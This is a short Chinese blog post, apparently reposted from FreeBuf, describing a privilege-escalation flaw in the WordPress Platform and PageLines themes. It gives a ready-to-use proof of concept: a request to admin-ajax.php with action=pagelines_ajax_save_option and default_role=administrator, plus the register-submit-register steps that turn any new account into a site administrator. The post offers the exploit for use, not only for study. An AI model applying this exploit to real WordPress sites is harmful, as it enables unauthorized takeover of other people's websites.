在FreeBuf看到wordpress主题又爆漏洞了，此主题使用量还是很多的……现在你们要的POC来了。

漏洞简介

某个WordPress网站如果使用了Platform主题（版本号小于1.4.4），黑客就可以轻易取得该网站的权限。

黑客可以利用恶意软件、SEO垃圾邮件以及其他方式，执行PHP代码来感染你的网站。在使用了主题Pagelines（版本号小于1.4.6）的WordPress网站中，黑客只要注册一个账号，就可以使用权限提升exp进行攻击。提升权限后黑客可以做许多事，包括使用WordPress主题文件编辑器。 更多漏洞说明

主题版本Platform1.4.3

漏洞说明只给了一张图，不过已经说得很详细了。我只是写个过程。

wp_ajax_pagelines_ajax_save_option和pagelines_ajax_save_option_callback是在一起的。

so，我们只要找到wp_ajax_pagelines_ajax_save_option就好了。

文件：/wp-admin/admin-ajax.php

所以只要是wp_ajax钩子都可以调用，哪怕是订阅者权限。

一共一句话还要exp么？

POC（概念验证程序）

http://localhost//wp-admin/admin-ajax.php?action=pagelines_ajax_save_option

post:default_role=administrator

先注册一个号，然后提交。什么也不显示也对了。然后再注册一个号，就是管理员了。

关于第二代码执行，好像必须得管理员权限。

文章来源：freeBuf.com